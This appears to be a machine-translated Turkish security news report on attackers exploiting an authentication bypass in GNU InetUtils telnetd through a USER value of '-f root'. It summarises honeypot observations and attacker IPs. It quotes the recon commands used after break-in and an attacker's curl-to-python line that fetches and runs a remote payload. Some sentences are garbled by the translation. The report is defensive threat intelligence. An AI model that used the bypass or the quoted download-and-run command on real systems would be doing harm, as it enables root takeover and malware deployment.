Tehdit aktörleri, kavram kanıtlama kodunun kamuya açık hale gelmesinden hemen sonra GNU InetUtils telnetd’deki kritik kimlik doğrulama atlama güvenlik açığından aktif olarak yararlanmaya başladı.
Bu kusur, uzaktaki saldırganların kimlik doğrulaması olmadan root erişimi elde etmesine olanak tanıyarak internete açık sistemlerde yaygın istismar girişimlerini tetikliyor.
Güvenlik açığı, GNU InetUtils telnetd’nin 1.9.3’ten 2.7’ye kadar olan sürümlerini etkiliyor ve güvenlik açığı Mart 2015’te kullanıma sunuldu.
Telnetd sunucusu, USER ortam değişkenini sunucuya aktarmadan önce uygun şekilde temizleyemiyor. /usr/bin/login kök ayrıcalıklarıyla çalışan ikili.
Kötü niyetli bir istemci “-f root” dizesini içeren bir USER ortam değişkeni oluşturduğunda ve telnet’i kullandığında -a veya --login parametresini kullanarak telnetd sunucusu herhangi bir kimlik doğrulama gerektirmeden saldırganın otomatik olarak root olarak oturum açmasını sağlar.
Bunun nedeni, oturum açma ikili dosyasının -f normal kimlik doğrulama süreçlerini atlayacak bir komut olarak işaretleyin.
| Güvenlik Açığı Ayrıntıları | |
|---|---|
| Şiddet | Yüksek |
| Etkilenen Sürümler | GNU InetUtils 1.9.3 – 2.7 |
| Saldırı Vektörü | Ağ (TCP bağlantı noktası 23) |
| Kimlik Doğrulaması Gerekli | Hiçbiri |
| Kazanılan Ayrıcalıklar | Kök erişimi |
| Açıklanma Tarihi | 20 Ocak 2026 |
Teknik Kullanım Yöntemi
Güvenlik açığı, telnetd’nin oturum açma komutu şablonunu nasıl oluşturduğundan yararlanıyor. Telnetd/telnetd.c dosyasında oturum açma çağrısı şu modeli kullanır: PATH_LOGIN " -p -h %h %?u{-f %u}{%U}".
%U değişken, herhangi bir temizleme işlemi yapılmadan istemciden alınan USER ortam değişkeninin değerine genişler.
Saldırganlar, ilk bağlantı anlaşması sırasında kötü niyetli USER değişkenini içeren Telnet IAC (Komut Olarak Yorumla) anlaşma paketleri göndererek bundan yararlanır.
Tipik bir yararlanma yükü, terminal hızı yapılandırmasını (9600 veya 38400 baud gibi), bir terminal türü bildirimini (XTERM-256COLOR veya benzeri) ve kritik USER.-f root parametre.
Güvenlik açığı, araştırmacı Kyu Neushwaistein (Carlos Cortes Alvarez) tarafından 19 Ocak 2026’da keşfedildi ve rapor edildi.
Güvenlik araştırmacısı Simon Josefsson, 20 Ocak 2026’da resmi danışma belgesini yayınladı ve henüz bir CVE tanımlayıcısı atanmamış olsa da yamaların hemen kullanıma sunulduğunu belirtti.
Kavram kanıtlarının yayınlanmasından birkaç saat sonra, güvenlik izleme platformları yaygın suiistimal girişimlerini tespit etti.
GreyNoise Labs, savunmasız bal küpü sensörlerini konuşlandırdı ve 21 Ocak 2026’dan itibaren 18 saatlik bir süre boyunca 60 istismar girişiminde bulunan 18 benzersiz saldırgan IP adresini gözlemledi.
İlk yararlanma etkinliği 21 Ocak’ta 07:19:15 UTC’de 38.145.220.204 IP adresinden kaynaklandı ve en son girişim 22 Ocak’ta 04:08:41 UTC’de 178.16.53.82’den kaydedildi.
En üretken saldırgan (178.16.53.82), 10 benzersiz sistemi hedef alan 12 ayrı oturum başlattı.
Ağ trafiği analizi, bu kampanyayla ilgili yakalanan 1.525 paketin tamamının, %100 kötü amaçlı trafiği temsil eden TCP bağlantı noktası 23 üzerindeki Telnet protokolü iletişimleri olduğunu ortaya çıkardı.
İzinsiz giriş tespit sistemleri, bazı saldırganların başarıyla kök düzeyinde erişim elde ettiğini doğrulayan “GPL ATTACK_RESPONSE kimlik kontrolü kök döndürdü” uyarılarını tetikledi.
Saldırgan Taktikleri ve Yükleri
Güvenlik araştırmacıları birden fazla farklı veri yükü çeşidi tespit etti; bu da saldırganların çeşitli istismar araç kitleri kullandığını gösteriyor:
Terminal Hızı Yapılandırmaları:
- 9600,9600 baud (2 saldırgan kaynağı)
- 38400,38400 baud (7 saldırgan kaynağı)
- 0,0 baud/anlaşma yok (3 saldırgan kaynağı)
- Belirtilmemiş (Minimum taşıma kapasitesine sahip 7 kaynak)
Terminal Tipi Beyanları:
- XTERM-256COLOR (5 kaynak, büyük harfli varyant)
- xterm-256color (3 kaynak, küçük harfli varyant)
- screen-256color (GNU Ekran çoklayıcıyı kullanan 1 kaynak)
- BİLİNMEYEN (genel terminal türlerine sahip 4 kaynak)
Saldırganların büyük çoğunluğu (%83,3) doğrudan kök hesapları hedef aldı, ancak bazıları “hiç kimse”, “arka plan programı” ve hatta hayali bir “varolmayan123” hesabı da dahil olmak üzere düşük ayrıcalıklı hesapları kullanarak istismar girişiminde bulundu; bu da kök oturum açma denemeleri için algılama sistemlerinin izlenmesinden kaçma girişimlerini akla getiriyor.
Bazı saldırganlar, Kali Linux sızma testi dağıtımlarının ve paylaşılan VPS ortamlarının kullanıldığını gösteren “kali.kali:0.0”, “MiniBear:0” ve “shared-vm2.localdomain:0” gibi ana bilgisayar adları dahil olmak üzere X11 DISPLAY değişkenleri aracılığıyla altyapı ayrıntılarını yanlışlıkla açığa çıkardı.
Saldırganlar, ele geçirilen sistemlere girdikten sonra parmak izi hedeflerine otomatik keşif komutları uyguladı:
textuname -a
id
cat /proc/cpuinfo
cat /etc/passwd
Bazı saldırganlar, komut çıktısını “S”, “U/EU” ve “blah” işaretleri gibi ayrıştırma sınırlayıcılarına sardı; bu, envanter yönetimi veya güvenlik açığı korelasyonu için komuta ve kontrol altyapısı tarafından otomatik toplama yapıldığını gösteriyor.
Kötü Amaçlı Yazılım Dağıtımı:
Aynı saldırgan şu komutu kullanarak ikinci aşama Python verisini indirip çalıştırmayı denedi:
textnohup curl -fsSL http://67.220.95.16:8000/apps.py | python - [target_IP] > /dev/null &
Bu yük dağıtım mekanizması şunları kullanır: nohup Kabuk sonlandırmasından sonra hayatta kalan arka planda yürütme için, kodu sessizce indirir. curlbunu Python’un stdin’i aracılığıyla yürütür ve çıktıyı bastırır.
67.220.95.16:8000 adresindeki kötü amaçlı yazılım dağıtım sunucusunun hizmet verdiği gözlemlendi apps.pymuhtemelen bir botnet istemcisi veya kripto madencilik kötü amaçlı yazılımı.
Özellikle, 67.220.95.16 IP adresi hem bir istismar kaynağı hem de kötü amaçlı yazılım dağıtım sunucusu olarak ikili amaçlara hizmet ediyordu.
Bu kötü amaçlı yazılım dağıtım girişimleri, curl veya Python kurulumları olmayan güçlendirilmiş bal küpü sistemlerinde büyük ölçüde başarısız oldu, ancak varsayılan araçlara sahip standart Linux sunucularında başarılı olacaktı.
Güvenlik ekipleri, ağlarını açığa çıkan telnet hizmetleri açısından derhal denetlemeli ve kimlik doğrulama günlüklerini, özellikle istismar kampanyasında belirlenen 18 saldırgan IP adresinden kaynaklanan şüpheli kök oturum açma girişimlerine karşı incelemelidir.
Kuruluşlar, herhangi bir başarılı istismarı, adli analiz, kimlik bilgisi rotasyonu ve sistemin yeniden inşası da dahil olmak üzere olay müdahale prosedürlerini gerektiren eksiksiz bir sistem ihlali olarak ele almalıdır.
Anında Güncellemeler Almak ve GBH’yi Google’da Tercih Edilen Kaynak Olarak Ayarlamak için bizi Google Haberler, LinkedIn ve X’te takip edin.